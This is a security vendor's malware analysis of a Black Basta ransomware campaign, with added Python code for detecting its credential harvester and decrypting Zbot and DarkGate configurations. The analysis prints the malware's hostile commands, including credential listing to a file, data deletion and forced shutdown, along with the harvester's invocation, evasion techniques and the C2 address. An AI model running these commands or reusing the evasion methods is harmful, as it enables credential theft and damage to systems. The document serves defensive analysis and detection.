Black Basta Ransomware Campaign Drops Zbot, DarkGate, and Custom Malware

  • ChatGPT paged: Each PDF page to text, then ChatGPT 4o (detailed)
  • Gemini 2.0: Full PDF with gemini-2.0-flash (8k output token limit)
  • Gemini 2.5: Full PDF with gemini-2.5-flash-preview-05-20 (65k output tokens limit)
  • Original: All text extracted from PDF

Original Text

Black Basta Ransomware Campaign Drops Zbot, DarkGate, and Custom Malware
Tyler McGraw
Last updated at Fri, 17 Jan 2025 21:25:06 GMT

Executive Summary

Beginning in early October, Rapid7 has observed a resurgence of activity related to the ongoing social engineering campaign being conducted by Black Basta ransomware operators. Rapid7 initially reported the discovery of the novel social engineering campaign in May 2024, followed by an update in August 2024, when the operators updated their tactics and malware payloads and began sending lures via Microsoft Teams. Now, the procedures followed by the threat actors in the early stages of the social engineering attacks have been refined again, with new malware payloads, improved delivery, and increased defense evasion.

Overview

The social engineering attacks are still initiated in a similar manner. Users within the target environment will be email bombed by the threat actor, which is often achieved by signing up the user’s email address to numerous mailing lists simultaneously. After the email bomb, the threat actor will reach out to the impacted users. Rapid7 has observed that initial contact still occurs primarily through Microsoft Teams, by which the threat actor, as an external user, will attempt to call or message the impacted user to offer assistance. The account domains in use include both Azure/Entra tenant subdomains (e.g., username[@]tenantsubdomain[.]onmicrosoft[.]com) and custom domains (e.g., username[@]cofincafe[.]com). In many cases, Rapid7 has observed that the threat actor will pretend to be a member of the target organization’s help desk or support team, or otherwise present themselves as IT staff. Below are examples of Microsoft Teams display names observed by Rapid7 to be in use by operators. The display names may or may not be padded with whitespace characters. Rapid7 has also observed threat actors use a first and last name, as the chat display name and/or account username, to impersonate an IT staff member within the targeted organization.

Operator Chat Display Name
  • Help Desk
  • HELP DESK
  • Help Desk Manager
  • Technical Support
  • Administracion

If the user interacts with the lure, either by answering the call or messaging back, the threat actor will attempt to get the user to install or execute a remote management (RMM) tool, including, but not limited to, QuickAssist, AnyDesk, TeamViewer, Level, or ScreenConnect. Rapid7 has also observed attempts to leverage the OpenSSH client, a native Windows utility, to establish a reverse shell. In at least one instance, the threat actor shared a QR code with the targeted user. The purpose of the QR code is unconfirmed but appears to be an attempt to bypass MFA after stealing a user’s credentials. The URL embedded within the QR code adheres to the following format: hxxps://[.]qr-[.]com.

Figure 1. A QR code (obfuscation by Rapid7) sent by an operator.

In a majority of cases, Rapid7 has observed that the operator, after gaining access to the user’s asset via an RMM tool, will then attempt to download and execute additional malware payloads. In one case handled by Rapid7, the operator requested more time — potentially to hand off the access to another member of the group.

Figure 2. An operator stalls for time.

The payload delivery methods vary per case, but have included external compromised SharePoint instances, common file sharing websites, servers rented through hosting providers, or even direct upload to the compromised asset in the case of RMM tool remote control. In one case, the operator used the group’s custom credential harvester to dump the user’s credentials, and the results were subsequently uploaded to a file sharing site, publicly exposing the stolen credentials.
SharePoint has been used to distribute copies of AnyDesk portable, likely to circumvent security measures that would prevent the user from downloading it directly from anydesk[.]com. Such attempts have been blocked by a web proxy in previous cases. The overall goal following initial access appears to be the same: to quickly enumerate the environment and dump the user’s credentials. When possible, operators will also still attempt to steal any available VPN configuration files. With the user’s credentials, the organization’s VPN information, and a potential MFA bypass, it may be possible for them to authenticate directly to the target environment.

Rapid7 has observed usage of the same credential harvesting executable previously reported as AntiSpam.exe, though it is now delivered in the form of a DLL and most commonly executed via rundll32.exe. Whereas before it was an unobfuscated .NET executable, the program is now commonly contained within a compiled 64-bit DLL loader. Rapid7 has analyzed at least one sample that has also been obfuscated using the group’s custom packer. The newest versions of the credential harvester save their output to the file 123.txt in the user’s %TEMP% directory, an update from the previous qwertyuio.txt file, though versions of the DLL distributed earlier in the campaign still output to the previous file.

Figure 3. The credential harvesting prompt shown to the user upon executing the DLL (redaction by Rapid7).

The credential harvester is most commonly followed by the execution of a loader such as Zbot (a.k.a. Zloader) or DarkGate. This can then serve as a gateway to the execution of subsequent payloads in memory, facilitate data theft, or otherwise perform malicious actions. Rapid7 has also observed operators distributing alternate payload archives containing Cobalt Strike beacon loaders and a pair of Java payloads containing a user credential harvester variant and a custom multi-threaded beacon by which to remotely execute PowerShell commands. In some cases, operators have sent the user a short command via Teams which begins an infection chain once executed by the targeted user.

Rapid7 continues to observe inconsistent usage of the group’s custom packer to deliver various malware payloads, including their custom credential harvester. A YARA rule is now publicly available that can be used to detect the packer. For example, this packer was used to deliver several obfuscated versions of Black Basta ransomware, obtained via open source intelligence, which directly links operators to the ongoing social engineering campaign.

At the time of writing, the threat actors behind the campaign continue to update both their strategy for gaining initial access and the tools subsequently used. For example, around the time the most recent campaign activity began, Rapid7 observed the delivery of a timestamped and versioned payload archive, 171024_V1US.zip (2024-10-17, version 1, US), which, when compared to a more recently delivered archive, 171124_V15.zip (2024-11-17, version 15), highlights the rapid iteration being undertaken. Many of the payloads being delivered follow a similar pattern to previous activity and often consist of a legitimate file where an export or function entry point has been overwritten to jump to malicious code, with the result signed using a likely stolen code signing certificate.

Intrusions related to the campaign should be taken seriously — the intent goes beyond typical phishing activity. Past campaign activity has led to the deployment of Black Basta ransomware. While Rapid7 has handled a high volume of incidents related to the current social engineering campaign across a variety of customer environments, to date every case has been contained before the operator was able to move laterally beyond the targeted user’s asset.

Technical Analysis

Initial Access

Each attack is preceded by the targeted user receiving an often overwhelming volume of emails.
An operator will then attempt to contact the user via Microsoft Teams, either by messaging or calling, and pretend to offer assistance. Operators will attempt to impersonate the organization’s help desk, for example by using the names of existing staff members. During this social engineering stage, operators often need to troubleshoot with the user to establish remote control of the user’s asset. Depending on the environment, for example, RMM tool downloads or execution may be blocked (often some, but not all) or QuickAssist may be disabled, causing the operator to cycle through their options for establishing a foothold. One of the most common first steps after gaining either the confidence of the user, or remote access, is to execute a custom credential harvester.

Credential Harvesting

The credential harvester used by operators, for example SafeStore.dll (SHA256: 3B7E06F1CCAA207DC331AFD6F91E284FEC4B826C3C427DFFD0432FDC48D55176), is an updated version of the previously analyzed program AntiSpam.exe. The DLL variant of the credential harvester is executed by a command like the following example:

rundll32.exe SafeStore.dll,epaas_request_clone

The module will quickly execute three enumeration commands to gather system information — systeminfo, route print, ipconfig /all — and then prompt the user for their password. The user’s credentials are appended onto a new line of the text file 123.txt with each attempt, after the enumeration command output, regardless of whether the credentials are correct. If the user enters the wrong password, they will be prompted to try again. The output of the enumeration commands and the user’s credentials were saved to the file qwertyuio.txt in older versions of the harvester, but are now saved to 123.txt, within the user’s %TEMP% directory. The enumeration commands within the updated version are executed via successive calls to CreateProcessA.

Figure 4. Success and failure messages for the credential harvester.
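A detector for the harvester behaviour described above, added here as an example (it is not code from the article or from Rapid7 InsightIDR): it correlates process-creation events shaped like Sysmon Event ID 1 to find a parent that launches the three enumeration commands (systeminfo, route print, ipconfig /all) in a short burst, and raises the severity when that parent is rundll32.exe loading a DLL by export name from outside the Windows directory. The events are constructed; the path C:\Users\alice\Downloads and the thresholds (15 seconds, two distinct tools) are assumptions to tune for your own telemetry.

```python
"""Enumeration-burst detector for the rundll32-delivered credential harvester.

Added example, not from the Rapid7 article. Events are constructed below to
resemble Sysmon Event ID 1 (process creation) records.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class ProcEvent:
    ts: datetime
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str


# The three commands the article says the harvester runs before prompting.
ENUM_TOOLS = ("systeminfo", "route", "ipconfig")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def enum_tool(ev: ProcEvent) -> Optional[str]:
    """Return the enumeration tool this event runs (directly, or via cmd.exe /c), else None."""
    name = _basename(ev.image).removesuffix(".exe")
    if name in ENUM_TOOLS:
        return name
    if name == "cmd":  # the harvester's format string is "cmd.exe /c %s%s ..."
        for tok in ev.cmdline.split()[1:]:
            tok = tok.lower().strip('"').removesuffix(".exe")
            if tok in ENUM_TOOLS:
                return tok
    return None


def rundll32_export_outside_windows(ev: ProcEvent) -> bool:
    """Heuristic (assumption, not the article's rule): rundll32.exe <dll>,<export>
    where the DLL does not live under the Windows directory."""
    if _basename(ev.image) != "rundll32.exe":
        return False
    parts = ev.cmdline.split(None, 1)
    if len(parts) < 2 or "," not in parts[1]:
        return False
    dll = parts[1].split(",", 1)[0].strip().strip('"').lower()
    return not dll.startswith("c:\\windows\\")


def find_enumeration_bursts(events, window=timedelta(seconds=15), min_tools=2):
    """One finding per parent PID that spawned >= min_tools distinct enumeration
    tools within `window`; severity is raised for the rundll32 export pattern."""
    by_pid = {ev.pid: ev for ev in events}
    hits_by_parent = {}
    for ev in events:
        tool = enum_tool(ev)
        if tool:
            hits_by_parent.setdefault(ev.ppid, []).append((ev.ts, tool))
    findings = []
    for ppid, hits in hits_by_parent.items():
        hits.sort()
        tools = {t for _, t in hits}
        if len(tools) < min_tools or hits[-1][0] - hits[0][0] > window:
            continue
        parent = by_pid.get(ppid)
        suspicious_parent = parent is not None and rundll32_export_outside_windows(parent)
        findings.append({
            "ppid": ppid,
            "tools": sorted(tools),
            "severity": "high" if suspicious_parent else "medium",
            "parent_cmdline": parent.cmdline if parent else None,
        })
    return findings


# Constructed sample: a harvester burst under rundll32, plus one benign ipconfig run.
T0 = datetime(2024, 11, 18, 9, 0, 0)
SAMPLE_EVENTS = [
    ProcEvent(T0, 4100, 3000, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\alice\Downloads\SafeStore.dll,epaas_request_clone"),
    ProcEvent(T0 + timedelta(seconds=1), 4101, 4100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c systeminfo"),
    ProcEvent(T0 + timedelta(seconds=2), 4102, 4100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c route print"),
    ProcEvent(T0 + timedelta(seconds=3), 4103, 4100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c ipconfig /all"),
    ProcEvent(T0 + timedelta(minutes=5), 5200, 1234, r"C:\Windows\System32\ipconfig.exe", "ipconfig /all"),
]

if __name__ == "__main__":
    for finding in find_enumeration_bursts(SAMPLE_EVENTS):
        print(finding)
```

The burst rule alone will also fire on administrators who script the same three commands, which is why the rundll32 export pattern only raises severity rather than being required; the file write to %TEMP%\123.txt that follows the burst is a second, independent signal worth correlating where file-creation telemetry is available.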
Based on analysis of one credential harvester sample, EventCloud.dll, the program was present in shellcode form. The shellcode is decrypted from the Cursor Group 880 resource embedded within the executable, using the XOR key 5A 3C 77 6E 33 30 4D 38 4F 38 40 78 41 58 51 30 42 5F 3F 67 71 00, and then injected locally. The following strings, extracted from the shellcode, show the output file and the dynamically loaded libraries:

Credential Harvester Strings
  • cmd.exe /c %s%s %s%s%s%s
  • 123.txt
  • ooki
  • Update filter
  • kb_outl
  • Need credentials to update...
  • Username:
  • Password:
  • ntdll.dll
  • Gdi32.dll
  • user32.dll
  • msvcrt.dll
  • ucrtbase.dll
  • Comctl32.dll
  • Advapi32.dll
  • kernel32.dll

The Java variant of the credential harvester, identity.jar, provides a similar prompt to the user, though when a password is entered it is appended, without the username, to a .txt file with a random 10-letter alphabetic name in the current working directory. The cancel button on the prompt, shown below, is not functional and the prompt is drawn on top of other windows, meaning that it will not close until the user has entered their password correctly.

Figure 5. The credential harvesting prompt created by identity.jar.

Malware Payloads

Following execution of a credential harvester, an operator will typically infect the asset with Zbot or DarkGate. One of the Zbot samples delivered after initial access, SyncSuite.exe (SHA256: DB34E255AA4D9F4E54461571469B9DD53E49FEED3D238B6CFB49082DE0AFB1E4), contains similar functionality and strings to other Zbot/Zloader samples previously reported by ZScaler. However, in addition to previously observed strings, the sample also contains encrypted strings for an embedded command help menu, error messages, and more. Rapid7 observed the embedded malware version was 2.9.4.0. Upon execution, the malware will copy itself to a random folder within the %APPDATA% directory. If the file does not have its original filename, however, the process will immediately exit. The malware also contains the functionality to establish persistence either via a Run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run or a scheduled task named after the executable, which executes the malware copy in %APPDATA% whenever the user logs on.
After collecting the hostname, username, and the installation date from the InstallDate value contained within the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion, this data is concatenated (delimited by underscore characters) and encrypted, along with other config information. It is then stored within the user’s registry inside a random key created at HKCU\Software\Microsoft. The analyzed sample will also load a fresh copy of ntdll.dll to avoid hooking, which is then used to perform calls to NTAPI functions. SyncSuite.exe ultimately injects itself into a suspended instance of msedge.exe, created using NtCreateUserProcess and executed via ResumeThread, a technique known as Process Hollowing.

All of the strings used by the malware are stored encrypted within the .rdata section along with the configuration. The strings are decrypted using an obfuscated loop that is ultimately a simple XOR operation with the hard-coded key 16 EB D5 3E AA E6 51 09 14 D3 DF 18 AD D6 1B BD BE, which is also stored in the .rdata section. The configuration is decrypted using an RC4 key, F3 F9 F7 FB FA F3 F7 F7 FF F5 F2 F3 FA FD FE F2 for this sample. The decrypted configuration for SyncSuite.exe can be seen below, with empty rows removed. The configuration contains a different public RSA key and botnet ID than the one previously shared by ThreatLabz, indicating that the campaign is being run by a different affiliate. All decrypted strings from SyncSuite.exe can be seen in the Zbot Strings section following the other Indicators of Compromise.

Figure 6. The decrypted Zbot configuration for SyncSuite.exe (1264 bytes).

Rapid7 has also observed the delivery of DarkGate malware following initial access.
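The Zbot string and configuration decryption just described, implemented as an added example (not code from the article or from Rapid7): a repeating-key XOR using the quoted 17-byte string key, and RC4 using the quoted 16-byte configuration key. The assumption that the XOR key repeats cyclically over each string (the article only says the loop is "ultimately a simple XOR") is mine; the ciphertexts below are constructed here rather than taken from SyncSuite.exe, and the RC4 routine is checked against the published "Key"/"Plaintext" test vector so the output on a real .rdata dump can be trusted.

```python
"""Zbot (Zloader) string and config decryption primitives.

Added example, not from the Rapid7 article. Keys are the ones quoted for
SyncSuite.exe; the sample ciphertexts are constructed here.
"""
from itertools import cycle

# 17-byte XOR key for the encrypted string table (from the article).
ZBOT_STRING_XOR_KEY = bytes.fromhex("16EBD53EAAE6510914D3DF18ADD61BBDBE")
# 16-byte RC4 key for the configuration blob (from the article).
ZBOT_CONFIG_RC4_KEY = bytes.fromhex("F3F9F7FBFAF3F7F7FFF5F2F3FAFDFEF2")


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR `data` with `key` repeated cyclically (assumed layout of the string table)."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then XOR the keystream over `data`."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                            # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_string(blob: bytes) -> str:
    """Decrypt one NUL-terminated string table entry."""
    plain = xor_repeating(blob, ZBOT_STRING_XOR_KEY)
    return plain.split(b"\0", 1)[0].decode("latin-1")


def decrypt_config(blob: bytes) -> bytes:
    return rc4(ZBOT_CONFIG_RC4_KEY, blob)


def rc4_self_test() -> bool:
    """Published RC4 test vector: key 'Key', plaintext 'Plaintext' -> BBF316E8D940AF0AD3."""
    return rc4(b"Key", b"Plaintext").hex().upper() == "BBF316E8D940AF0AD3"


# Constructed ciphertexts (made by encrypting known text with the sample's keys),
# standing in for bytes carved out of the .rdata section of a real sample.
SAMPLE_STRING_CT = xor_repeating(b"constructed zbot string\0", ZBOT_STRING_XOR_KEY)
SAMPLE_CONFIG_CT = rc4(ZBOT_CONFIG_RC4_KEY, b"botnet_id=constructed\r\n")

if __name__ == "__main__":
    print("rc4 self-test:", rc4_self_test())
    print(decrypt_string(SAMPLE_STRING_CT))
    print(decrypt_config(SAMPLE_CONFIG_CT))
```

Because both primitives are symmetric, the same functions encrypt as well as decrypt, which is how the constructed samples are produced; on a real dump, carve each string at its NUL terminator before passing it to decrypt_string, since the key position restarts for every entry under the cyclic assumption.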
One payload archive contained both a DarkGate infection initiation script, test.vbs, and an executable copy of the DarkGate malware itself, SafeFilter.exe (SHA256: EF28A572CDA7319047FBC918D60F71C124A038CD18A02000C7AB413677C5C161), though this copy is packed using the group’s custom packer. The final payload containing the DarkGate malware, after several layers of decrypting and loading, contains the version string 7.0.6. If the folder c:\debugg exists on the system when the malware is executed, it will display the version number via MessageBoxA. The configuration for this sample can be seen below along with hard-coded commands. Notably, the campaign ID for the sample appears to be drk2.

Figure 7. DarkGate displays its version using a debug message box.

The configuration is decrypted with the key ckcilIcconnh within a customized XOR loop near the beginning of execution to reveal CRLF-delimited options. However, due to the implementation of the decryption loop, the keyspace is effectively reduced to that of a single byte (0-255) after the first byte. For this sample the XOR key for the majority of the config is 0x60, which allows the encrypted data to be trivially brute-forced.

SafeFilter.exe DarkGate Config (key-value pair: description)
  • 0=179.60.149[.]194|: C2 domains or IP addresses, delimited with ‘|’ characters.
  • 8=No: If enabled and the file C:\ProgramData\hedfdfd\Autoit3.exe does not exist, call MessageBoxTimeoutA using keys 11 and 12 and a timeout of 1770 ms.
  • 11=Error: Used by key 8 as a message box title.
  • 12=PyKtS5Q: The string Error, base64 encoded with the custom alphabet zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=. Used by key 8 as a message box caption.
  • 13=6: Unknown.
  • 14=Yes: Unknown.
  • 15=80: C2 communication port.
  • 1=Yes: Enables infection.
  • 32=Yes: If enabled, attempt bypass of detected security products. For example, enables calls to RtlAdjustPrivilege and NtRaiseHardError to cause a crash if hdkcgae is not present in C:\temp\ and a Kaspersky product has been detected.
  • 3=No: If disabled, do an anti-VM display check.
  • 4=No: If enabled, compare system drive size to key 18. If below, exit.
  • 18=100: Minimum drive size in GB.
  • 6=No: If enabled and key 3 is disabled, check the display for known virtual machine display strings using EnumDisplayDevicesA. If matched, exit. Failed to match properly when tested.
  • 7=No: If enabled, compare system RAM to key 19. If below, exit.
  • 19=4096: Minimum RAM size in MB.
  • 5=No: If enabled, check the registry key ProcessorNameString at HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 for xeon. If found, exit.
  • 21=No: Unknown.
  • 22: Not present in the config for this sample, but still checked for in the code. If enabled, set the variant string to DLL, otherwise ?.
  • 23=Yes: If enabled, set the variant string to AU3 for Autoit3 payloads.
  • 31=No: If enabled, set the variant string to AHK for AutoHotKey payloads.
  • 25=drk2: Campaign ID.
  • 26=No: Unknown.
  • 27=rsFxMyDX: Decryption key, also used to bound/find payloads stored within other files.
  • 28=No: Unknown.
  • 29=2: Unknown.
  • 35=No: Unknown.
  • tabla=IsUiPQ4&atzM5N=0($" 3]TGfyK8JYwvO61SAF{ndrDu ol29RkmqCpgxeX[EH,V)}7j bZBc.WLh: Unknown.

DarkGate Hard-coded Commands
  • /c cd /d "C:\Users\User\AppData\Roaming" && move
  • /c cd /d "C:\Users\User\AppData\Local" && move
  • /c cmdkey /delete:
  • /c cmdkey /list > c:\temp\cred.txt
  • /c del /q /f /s C:\Users\User\AppData\Roaming\Mozilla\firefox
  • /c ping 127.0.0.1 & del /q /f /s c:\temp & del /q /f /s C:\ProgramData\hedfdfd\ & rmdir /s /q C:\ProgramData\hedfdfd\
  • /c shutdown -f -r -t 0
  • /c shutdown -f -s -t 0
  • /c wmic ComputerSystem get domain > C:\ProgramData\hedfdfd\fcadaab

During execution, DarkGate will hash certain strings and use the result to create or check files in the directories C:\ProgramData\hedfdfd (mainfolder) and C:\temp.
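A decoder for the two encodings in the SafeFilter.exe configuration described above, added here as an example (not code from the article or from Rapid7): a base64 decoder and encoder over the custom alphabet quoted for key 12, and a single-byte XOR recovery that scores each of the 256 candidate keys by how many CRLF-delimited key=value lines it yields, which is all the reduced keyspace noted above requires. The encrypted blob below is constructed by XORing a made-up config with 0x60; its C2 address is an RFC 5737 documentation address, not the sample's. The real loop keys the first byte differently, so on a real blob the recovery would be run from offset 1; treating the whole blob as single-byte XOR is a simplification on my part.

```python
"""Decoding the DarkGate (SafeFilter.exe) configuration encodings.

Added example, not from the Rapid7 article. The sample blob is constructed.
"""
import re

# Custom base64 alphabet quoted in the article. '=' is the 64th symbol (where
# standard base64 has '/'), and the encoder emits no padding: leftover bits are
# dropped on decode and zero-filled into a final symbol on encode.
DARKGATE_B64_ALPHABET = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+="
_B64_INDEX = {ch: i for i, ch in enumerate(DARKGATE_B64_ALPHABET)}


def custom_b64decode(text: str) -> bytes:
    acc, nbits, out = 0, 0, bytearray()
    for ch in text:
        acc = (acc << 6) | _B64_INDEX[ch]
        nbits += 6
        if nbits >= 8:
            nbits -= 8
            out.append((acc >> nbits) & 0xFF)
    return bytes(out)


def custom_b64encode(data: bytes) -> str:
    acc, nbits, out = 0, 0, []
    for b in data:
        acc = (acc << 8) | b
        nbits += 8
        while nbits >= 6:
            nbits -= 6
            out.append(DARKGATE_B64_ALPHABET[(acc >> nbits) & 0x3F])
    if nbits:  # left-align the trailing bits into one last symbol
        out.append(DARKGATE_B64_ALPHABET[(acc << (6 - nbits)) & 0x3F])
    return "".join(out)


# A DarkGate option line: numeric or alphabetic key, '=', anything up to CRLF.
CONFIG_LINE = re.compile(rb"^[0-9A-Za-z]+=[^\r\n]*$")


def config_score(plain: bytes) -> int:
    """0 if any byte is non-printable (CR, LF, TAB allowed), else the number of option lines."""
    if any(b > 0x7E or (b < 0x20 and b not in b"\r\n\t") for b in plain):
        return 0
    return sum(1 for line in plain.split(b"\r\n") if CONFIG_LINE.match(line))


def recover_single_byte_xor(blob: bytes):
    """Try all 256 keys; return (key, plaintext) for the best-scoring one, or None if nothing fits."""
    best_key = max(range(256), key=lambda k: config_score(bytes(b ^ k for b in blob)))
    plain = bytes(b ^ best_key for b in blob)
    return (best_key, plain) if config_score(plain) else None


def parse_config(plain: bytes) -> dict:
    cfg = {}
    for line in plain.decode("ascii").split("\r\n"):
        if "=" in line:
            key, value = line.split("=", 1)
            cfg[key] = value
    return cfg


# Constructed sample (not the article's blob): a made-up config XORed with 0x60.
_SAMPLE_PLAIN = b"0=203.0.113.10|\r\n1=Yes\r\n8=No\r\n11=Error\r\n12=PyKtS5Q\r\n15=80\r\n25=drk2\r\n"
SAMPLE_BLOB = bytes(b ^ 0x60 for b in _SAMPLE_PLAIN)


def decode_sample():
    """Recover the key, parse the options, and decode the base64 caption in key 12."""
    key, plain = recover_single_byte_xor(SAMPLE_BLOB)
    cfg = parse_config(plain)
    cfg["12_decoded"] = custom_b64decode(cfg["12"]).decode("ascii")
    return key, cfg


if __name__ == "__main__":
    print(decode_sample())
```

Scoring by structure rather than by a known plaintext byte is what makes the recovery robust to config changes between builds: any key that produces a CRLF-delimited list of key=value lines wins, and the encoder is included so that decoded values such as the caption can be round-tripped when comparing samples.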
The hashing algorithm uses a randomized key generated at runtime, so the hashes will differ across infections. Commonly used strings and their resultant hashes, for the analysis environment, are shown below.

DarkGate Custom Hashes (path string: hash)
  • mainfolder: hedfdfd
  • logsfolder: fhhcfhh
  • settings: dhkbbfc
  • domain: fcadaab
  • mutex0: hfgdced
  • mutex1: cekchde
  • au3: dgfeabe
  • c.txt: adfcbdd
  • cc.txt: dehgaba
  • script: daaadeh
  • fs.txt: hdkcgae

DarkGate may also change its behavior if a known security product is detected. This is achieved by using CreateToolhelp32Snapshot and related functions to loop through running processes, which are compared to a hard-coded list. The malware will also check for known installation directories using GetFileAttributesA. If a security product is found, a flag will be set which may alter the execution path. Only the following products had associated flags:

DarkGate “Supported” Security Products
  • Windows Defender
  • Sophos
  • Quick Heal
  • MalwareBytes
  • Panda Security
  • Norton/Symantec
  • ESET/Nod32
  • Kaspersky
  • Avast
  • SentinelOne
  • Bitdefender

At the end of the first execution of the DarkGate payload, it will then attempt to inject itself into a host process. First, DarkGate will select the injection target by searching a list of hard-coded directories, subdirectories included, for any executable that contains the string updatecore.exe. The path C:\Program Files (x86)\Microsoft\EdgeUpdate\ is searched first, with the fallback being C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe. If a matching Edge executable is not found, the path C:\Program Files (x86)\Google\Update\ is then searched. If that also fails, the malware will attempt to use C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe. After successfully choosing the injection target, DarkGate will then inject itself into the target process using shellcode, terminating the original instance of the final DarkGate payload after executing the shellcode. When creating an instance of the target process to inject, DarkGate will also attempt to spoof the parent process ID (PPID) of the injection target by enumerating running processes for accessibility using OpenProcess and then randomly selecting one from an assembled list. The PPID of the target is then updated using UpdateProcThreadAttribute prior to creation with CreateProcessA.

Execution of the injected process is coordinated by checking for the presence of two file-based mutexes within C:\ProgramData\hedfdfd\ (mainfolder). Each instance of the DarkGate malware checks both of the file-based mutexes. The file mutex usage is checked via calls to CreateFileA using an exclusive share mode flag (0) and a creation disposition of CREATE_ALWAYS, which means that if the mutex is already in use by another DarkGate instance the call will fail. If the calls for both of DarkGate’s file mutexes, hfgdced and cekchde, fail, DarkGate will exit.
As a result of having two mutexes, DarkGate will typically run within two injected process instances at the same time, so if one process is terminated, the remaining instance will spawn another. If a DarkGate instance is spawned and both calls to open the file-based mutexes fail, indicating two existing DarkGate instances, the new instance will terminate. This technique is rarely used by malware developers and highlights the sophistication of DarkGate malware.

DarkGate will unconditionally log keystrokes as well as clipboard data that is under 1024 bytes. The logged data is stored encrypted at C:\ProgramData\hedfdfd\fhhcfhh (mainfolder\logsfolder) within files named .log. The logged data may be sent directly to the C2 address contained within the config. A thread is also created to persist on infected systems by creating the Run key daaadeh (script) at HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The Run key will point to the copies of Autoit3.exe and the compiled AU3 script payload dgfeabe.a3x (au3) created at C:\ProgramData\hedfdfd (mainfolder), with the former executing the latter every time the user logs on. When the AU3 script is executed, DarkGate reinfects the system. The same thread, however, continuously monitors the text within the infected user’s active window, sleeping 1500 ms between checks, and will delete the registry key if a blacklisted application is detected. This list includes popular analysis tools such as Process Hacker, Process Monitor, Task Manager, and even the Windows Registry Editor.

The DarkGate sample executed by SafeFilter.exe contains 78 remote commands, some of which can be seen below with their intended function. Every loop, the malware will re-send the text of the active window, the user idle time, and whether or not the malware instance has admin rights, before checking for a command.

DarkGate Remote Commands (command ID: function)
  • 1000: Sleep for a randomized amount of time.
  • 1004: Use MessageBoxA to display the message test msg.
  • 1044, 1045, 1046: Click the user’s mouse at specified screen coordinates using SetCursorPos and successive calls to mouse_event. 1044 for double left-click, 1045 for single left-click, 1046 for single right-click.
  • 1049: Create a remote shell via powershell.exe.
  • 1059: Terminate process by PID.
  • 1061: Inject DarkGate shellcode into a specified process, or an Edge/Chrome process if none is selected. The shellcode is then executed via ResumeThread.
  • 1062, 1063, 1064: Inject DarkGate shellcode into a specified process, or cmd.exe if none is selected. The shellcode is then executed via CreateRemoteThread.
  • 1066: Remove infection files by using cmd.exe to delete the staging directories C:\ProgramData\hedfdfd and c:\temp.
  • 1071: Steal sitemanager.xml and recentservers.xml from %APPDATA%\FileZilla\ if present.
  • 1079: If admin, delete stored credentials found using cmdkey.
  • 1080: Rename browser directories for Firefox, Chrome, and Brave if present, after terminating the related browser executable. Attempt to steal Opera cookies if present, after terminating the process.
  • 1081: Use the NTAPI calls RtlAdjustPrivilege and NtRaiseHardError to crash the system.
  • 1083: Use the shutdown command to turn the system off.
  • 1084: Use the shutdown command to restart the system.
  • 1089: If 1=Yes in the config, reinfect the system with AU3 payloads.
  • 1093: Create a remote shell via cmd.exe.
  • 1097: Infect the system with the AU3 variant. Creates the files script.a3x and Autoit3.exe in c:\temp and then executes script.a3x via Autoit3.exe using CreateProcessA.
  • 1104: Infect the system with the AHK variant. Creates the files script.ahk, test.txt, and AutoHotkey.exe in c:\temp and then executes script.ahk via AutoHotkey.exe using CreateProcessA.
  • 1108: Infect the system with the DLL variant. Creates the files libcurl.dll, test.txt, and GUP.exe in c:\temp and then executes GUP.exe via CreateProcessA.
  • 1111: Create the files ransom.txt and decrypter.exe in c:\temp. Terminate decrypter.exe if already running and then execute decrypter.exe using CreateProcessA. Likely ransomware deployment method.

DarkGate Remote Command Related Strings
  • U_Binder
  • U_BotUpdate
  • U_Constantes
  • U_FTPRecovery
  • U_FileManager
  • U_FileManagerMisc
  • U_GetScreens
  • U_HVNC
  • U_HVNC_7
  • U_HWID
  • U_InfoRecovery
  • U_InjectOnFly
  • U_Keylogger
  • U_LNKStartup
  • U_MemExecute
  • U_MemExecuteMisc
  • U_RemoteScreen
  • U_SysApi
  • U_SysNtReadWrite
  • U_miniclipboard
  • u_AntiAntiStartup
  • u_Antis
  • u_AudioRecord
  • u_CustomBase64
  • u_ExtraMisc
  • u_HollowInstall
  • u_InjectEP
  • u_InvokeBSOD
  • u_RDPRecovery
  • u_Ransomware
  • u_ReadCookies
  • u_ReverseShell
  • u_RootkitMutex
  • u_Settings
  • u_SettingsPad
  • u_ShellcodeEP
  • u_UnlockCookies
  • u_loadpe
  • hxxps://ipinfo[.]io/ip

Mitigation Guidance

Rapid7 recommends taking the following precautions to limit exposure to these types of attacks:
  • Restrict the ability for external users to contact users via Microsoft Teams to the greatest extent possible. This can be done, for example, by blocking all external domains or creating a white/black list. Microsoft Teams will allow all external requests by default. For more information, see this reference.
  • Standardize remote management tools within the environment. For unapproved tools, block known hashes and domains to prevent usage. Hash blocking can be done, for example, via Windows AppLocker or an endpoint protection solution.
  • Provide user awareness training regarding the social engineering campaign. Familiarize users with official help desk and support procedures to enable them to spot and report suspicious requests.
  • Standardize VPN access. Traffic from known low-cost VPN solutions should be blocked at the firewall level if there is no business use case.

Rapid7 Customers

